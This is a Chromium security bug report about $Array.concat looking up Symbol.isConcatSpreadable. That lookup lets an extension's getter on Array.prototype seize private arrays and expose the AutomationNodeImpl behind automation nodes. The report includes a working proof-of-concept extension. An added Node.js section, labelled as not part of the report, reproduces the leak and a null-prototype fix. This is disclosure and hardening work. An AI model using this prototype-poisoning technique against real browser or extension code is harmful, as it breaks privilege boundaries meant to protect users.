$Array.concat leaks arguments
Reported by jannhorn@googlemail.com, Aug 19 2016
Issue description
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Steps to reproduce the problem:
1. In dev-channel Chrome, run an extension with the following files:
manifest.json:
{
  "manifest_version": 2,
  "name": "isConcatSpreadable demo",
  "version": "1",
  "background": { "scripts": ["background.js"] },
  "automation": {},
  "permissions": ["https://var.thejh.net/"]
}
background.js:
// Getter on Array.prototype: fires for every array that concat() consults,
// with that array as `this`. Extend the readonly attribute list when we see it.
Array.prototype.__defineGetter__(Symbol.isConcatSpreadable, function() {
  if (this.indexOf('accessKey') !== -1) {
    this.push('RAW');
    this.push('rootImpl');
    debugger;
  }
});
// Touching chrome.automation loads the automation bindings, which run the
// $Array.concat() call while the getter above is installed.
chrome.automation;
delete Array.prototype[Symbol.isConcatSpreadable];
chrome.tabs.create({url: 'https://var.thejh.net/'}, function(tab) {
  chrome.automation.getTree(tab.id, function(tree) {
    // 'RAW' is now a readonly attribute; make it resolve to the impl itself.
    __defineGetter__.call(Reflect.getPrototypeOf(Reflect.getPrototypeOf(tree.rootImpl)), 'RAW', function() {
      return this;
    });
    debugger;
  });
});
2. Open the background page in inspector and restart the extension.
3. When the debugger statement is hit, try accessing the RAW property of any tree node, e.g. `tree.RAW` - it now reveals the backing AutomationNodeImpl instance, which as far as I can tell should not be exposed.
What is the expected behavior?
$Array.concat (and $String.replace and $String.split) should probably not look up symbol properties.
What went wrong?
The issue here is the following code in automation_node.js:
utils.expose(AutomationNode, AutomationNodeImpl, {
  functions: [
    [...]
  ],
  readonly: $Array.concat(publicAttributes, [
    'parent',
    [...]
  ]),
});
The $Array.concat() call causes lookups of the Symbol.isConcatSpreadable property on publicAttributes and the array literal in the second argument (see step 7b of http://www.ecma-international.org/ecma-262/6.0/#sec-array.prototype.concat and http://www.ecma-international.org/ecma-262/6.0/#sec-isconcatspreadable). Because these are normal arrays, they have Array.prototype as prototype, causing getters for Symbol.isConcatSpreadable on Array.prototype to fire, leaking the array as `this`.
Now, in this case, you can access the private object backing any automation node by accessing its RAW property. This object seems to be pretty useless for an attacker, but similar issues could potentially lead to security problems in the future.
Did this work before? N/A
Chrome version: 52.0.2743.116 Channel: stable
OS Version:
Flash Version: Shockwave Flash 22.0 r0
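To make the mechanism concrete outside Chrome, here is a self-contained Node.js reproduction of the leak and of one way to close it. It is an added example and is not part of the report or of Chromium's bindings code: `$Array`, `expose`, `exposeVulnerable`, `exposeHardened`, `nullProtoCopy`, `runDemo`, the sample `impl` object and the attribute list are constructed stand-ins for the report's `$Array.concat`, `utils.expose`, `AutomationNodeImpl` and `publicAttributes`, and the `['parent']` literal stands in for the elided list. The hardened variant goes beyond what the report states: it gives the concatenated arrays a null prototype so that the `Symbol.isConcatSpreadable` (and `constructor`) lookups have nothing to inherit and never reach a poisoned `Array.prototype`.

```javascript
'use strict';

// Saved builtin taken before untrusted code runs, in the spirit of Chrome's
// $Array safe builtins: $Array.concat(receiver, ...args). Constructed for this
// example; not Chromium's implementation.
const $Array = {
  concat: Function.prototype.call.bind(Array.prototype.concat),
};

// Minimal stand-in for utils.expose(): every readonly name becomes an accessor
// on the public wrapper that forwards to the private impl object.
function expose(impl, readonlyNames) {
  const wrapper = {};
  for (let i = 0; i < readonlyNames.length; i++) {
    const name = readonlyNames[i];
    Object.defineProperty(wrapper, name, {
      enumerable: true,
      get: () => impl[name],
    });
  }
  return wrapper;
}

// The pattern from automation_node.js: both arrays inherit from
// Array.prototype, so concat's IsConcatSpreadable lookup walks the prototype
// chain and fires any Symbol.isConcatSpreadable getter planted there, with the
// private array as `this`. (The report's literal is elided; ['parent'] stands in.)
function exposeVulnerable(impl, publicAttributes) {
  return expose(impl, $Array.concat(publicAttributes, ['parent']));
}

// Hardening used by this example: give the arrays a null prototype. Then
// Get(arr, @@isConcatSpreadable) and Get(arr, 'constructor') find nothing to
// inherit, IsConcatSpreadable falls through to IsArray(), and concat still
// spreads them without ever touching Array.prototype. Assumes dense arrays,
// so that every index read and the 'length' read hit own data properties.
function nullProtoCopy(arr) {
  const copy = Object.setPrototypeOf([], null);
  for (let i = 0; i < arr.length; i++) copy[i] = arr[i];
  return copy;
}
function exposeHardened(impl, publicAttributes) {
  const priv = Object.setPrototypeOf(['parent'], null);
  return expose(impl, $Array.concat(nullProtoCopy(publicAttributes), priv));
}

// Attacker side, mirroring the report's background.js: capture every array
// concat() consults, append 'RAW' to the one that looks like the attribute
// list, and plant a RAW accessor that returns its receiver, i.e. the impl.
function installAttackerGetters(leaked) {
  Object.defineProperty(Array.prototype, Symbol.isConcatSpreadable, {
    configurable: true,
    get() {
      leaked.push(this);
      if (Array.isArray(this) && this.indexOf('accessKey') !== -1) this.push('RAW');
      return undefined; // undefined => spec falls back to IsArray(), so concat behaves normally
    },
  });
  Object.defineProperty(Object.prototype, 'RAW', {
    configurable: true,
    get() { return this; },
  });
}
function removeAttackerGetters() {
  delete Array.prototype[Symbol.isConcatSpreadable];
  delete Object.prototype.RAW;
}

// Run one expose() variant under attack and report what leaked.
function runDemo(exposeFn) {
  // Constructed sample node: the private impl the wrapper forwards to.
  const impl = { name: 'root', role: 'rootWebArea', accessKey: '', parent: null };
  const publicAttributes = ['name', 'role', 'accessKey']; // constructed sample list
  const leaked = [];
  installAttackerGetters(leaked);
  try {
    const node = exposeFn(impl, publicAttributes);
    return {
      leakedArrays: leaked.length,                               // arrays handed to the getter as `this`
      hasRaw: Object.prototype.hasOwnProperty.call(node, 'RAW'),  // did a RAW accessor get created?
      rawIsImpl: node.RAW === impl,                               // does it hand back the private impl?
    };
  } finally {
    removeAttackerGetters();
  }
}

console.log('vulnerable:', runDemo(exposeVulnerable)); // leakedArrays 2, hasRaw true, rawIsImpl true
console.log('hardened:  ', runDemo(exposeHardened));   // leakedArrays 0, hasRaw false, rawIsImpl false
```

The getter returns `undefined` on purpose: per the spec's IsConcatSpreadable, a non-undefined value is coerced to a boolean, while `undefined` falls back to `IsArray(O)`, so the concatenation proceeds exactly as before and the bindings notice nothing. In the vulnerable run the getter sees both arrays and grows the attribute list by one entry, which `expose` dutifully turns into an accessor; in the hardened run it sees neither. Null-prototype arrays are one option; a copy loop that uses only saved references and own properties is another, but any variant has to avoid every prototype-walking operation (`for...of`, `constructor`/`@@species`, index writes onto an array that still inherits from `Array.prototype`), not just `concat`.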
Aug 24 2017
Issue has not been modified or commented on in the last 365 days, please re-open or file a new bug if this is still an issue. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
Comment 1 by tkonch...@chromium.org, Aug 24 2016